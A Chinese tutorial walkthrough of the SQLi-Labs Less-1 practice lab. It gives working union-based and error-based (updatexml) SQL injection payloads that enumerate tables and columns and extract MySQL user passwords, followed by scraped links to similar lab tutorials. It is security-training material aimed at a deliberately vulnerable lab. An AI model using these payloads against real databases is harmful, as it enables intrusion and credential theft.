第一关是单引号字符型注入,推荐使用联合注入、报错注入

方式一:联合注入

参考文章:联合注入使用详解,原理+步骤+实战案例

第一步、判断注入点

地址栏输入:?id=1' and 1 -- a,正常显示

地址栏输入:?id=1' and 0 -- a,异常(空)显示,确定注入点为:单引号字符型

第二步、判断字段数

地址栏依次输入:

?id=1' order by 1 -- a

?id=1' order by 2 -- a

?id=1' order by 3 -- a

?id=1' order by 4 -- a,开始报错,确定字段数为:3

第三步、判断显示位

地址栏输入:?id=0' union select 1,2,3 -- a

第四步、脱库

获取所有表:

?id=0' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3 -- a

获取所有字段:

?id=0' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),3 -- a

获取账号密码:

?id=0' union select 1,(select group_concat(host,user,password) from mysql.user),3 -- a

方式二:报错注入

参考文章:报错注入使用详解,原理+步骤+实战教程

第一步、判断是否报错

地址栏输入:?id=1'

页面显示数据库的报错信息,适合使用报错注入。

第二步、验证报错函数

地址栏输入:?id=1' and updatexml(1,0x7e,3); -- a

页面正常报错,报错函数可以正常使用。

第三步、脱库

获取当前数据库:

?id=-1' and updatexml(1,concat('~',database()),3) -- a

获取所有表:

?id=-1' and updatexml(1,concat('~',substr((select group_concat(table_name)from information_schema.tables where table_schema=database()) , 1 , 31)
),3) -- a

获取账号密码:

?id=-1' and updatexml(1,concat('~',substr((select password from mysql.user where user='mituan') , 1 , 31)
),3) -- a

推荐专栏

《网络安全快速入门》 用最短的时间,掌握最核心的网络安全技术,持续更新……

《靶场通关教程》 各个靶场的通关教程,持续更新……

感谢你的点赞、收藏、评论,我是三日,祝你幸福!

SQLi Labs Less-1 联合注入+报错注入相关推荐

  1. SQLi LABS Less 27 联合注入+报错注入+布尔盲注+时间盲注

    第27关是单引号字符型注入: 过滤了注释(/* -- #),关键字(select union),空格: 这篇文章提供联合注入.报错注入.布尔盲注.时间盲注四种解题方式. 其他 SQLi LABS 靶场 ...

  2. SQLi LABS Less 25 联合注入+报错注入+布尔盲注

    第二十五关单引号字符型注入: 过滤了关键字(and.or),可以使用双写绕过: 这篇文章提供了联合注入.报错注入.布尔盲注三种解题方法. SQLi LABS 其余关卡可参考我的专栏:SQLi-LABS ...

  3. SQLi LABS Less-26 联合注入+报错注入+布尔盲注+时间盲注

    第26关是单引号字符型注入: 后台过滤了关键字( and  or ),注释(/*  #  --  /),空格: 这篇文章提供联合注入.报错注入.布尔盲注.时间盲注四种解题方式. 目录 一.功能分析 二 ...

  4. SQL注入-盲注-时间注入-报错注入-布尔盲注-DNSlog注入-宽字节注入-WAF绕过-SqlMap使用

    Sqli-labs的安装 1.安装WAMP http://www.wampserver.com/ WAMP是php + mysql + Apache环境集成工具 2.下载Sqli-labs https ...

  5. SQLi LABS Less 23 联合注入+报错注入+布尔盲注

    第23关是单引号字符型注入: 过滤了注释,使用闭合引号来绕过: 这篇文章提供联合注入.报错注入.布尔盲注三种解题方式. 一.功能分析 这一关是一个简单的查询功能,在地址栏输入id,后台根据id查询数据 ...

  6. SQLi LABS Less-11 联合注入+报错注入

    第十一关是单引号字符型注入,推荐使用联合注入.报错注入 方式一:联合注入 参考文章:联合注入使用详解 原理+步骤+实战教程 第一步.判断注入类型 用户名输入: a' or 1 -- a 密码随便输入: ...

  7. SQLi LABS Less-12 联合注入+报错注入

    第十二关是双引号+括号的字符型注入 , 推荐使用联合注入.报错注入. 方式一:联合注入 参考文章:联合注入使用详解 原理+步骤+实战教程 第一步.判断注入类型 用户名输入:a") or 1 ...

  8. SQLi LABS Less-4 联合注入+报错注入

    第四关是双引号+括号的字符型注入,推荐使用联合注入.报错注入 方式一:联合注入 参考文章:联合注入使用详解 原理+步骤+实战教程 第一步.判断注入类型 地址栏输入 ?id=1") and 1 ...

  9. SQLi LABS Less-3 联合注入+报错注入

    第三关是单引号+括号的字符型注入 ,推荐使用联合注入.报错注入. 方式一:联合注入 推荐文章:联合注入使用详解,原理+步骤+实战教程 第一步.判断注入点类型 地址栏输入 ?id=1') and 1 - ...

最新文章

  1. 一个妹子图应用客户端源码
  2. Docker查看远端仓库的标签工具
  3. 【学习】Android开入门教程
  4. Queue 队列的用法
  5. 中文分词算法python_Python FMM算法的中文分词器实现方法源码
  6. Angular 下的 function
  7. SAP Spartacus Route Alias
  8. 让python脚本像普通程序一样运行
  9. [luoguP2324] [SCOI2005]骑士精神(A*?)
  10. [导入]基于D3D Effect的引擎模式探讨。
  11. PDF转图片的所有可行方法,全部都在这里了!
  12. 赛门铁克symantec 卸载需要密码解决方法
  13. 超平面(hyperplane)的定义
  14. IDEA,Pycharm等环境中复制代码到word去除黑色背景
  15. 【20CSPS提高组】函数调用
  16. UnityShader入门精要——运动模糊(2)
  17. Android异种机型系统适配:application定义的app名字和安装到手机后桌面显示app名字不一致
  18. ARM64+树莓派4b+JLINK仿真器实验环境搭建指南
  19. 安卓微信7.0版本的微信支付只支持拉起默认的微信,不支持应用双开的微信
  20. matlab计算涡度的函数_涡度的计算

热门文章

  1. 关于Keil4 转到 Keil5以后的一些错误解决
  2. JS模拟实现数组的map方法
  3. 微信小程序之旅一(注册页面的使用)
  4. 华为企业互动社区云计算板块
  5. 开源TinyXML 最简单的新手教程
  6. Lucene之样例解析(1)-配置Lucene的源代码
  7. Visual Stdio下安装WTL的向导Widzard
  8. 大数据之-Hadoop之HDFS_读数据流程_原理篇---大数据之hadoop工作笔记0069
  9. Sharding-Sphere,Sharding-JDBC_介绍_Sharding-Sphere,Sharding-JDBC分布式_分库分表工作笔记001
  10. DOTNET零碎总结---VB.NET修改数据存在多个txtbox时,SQL语句的操作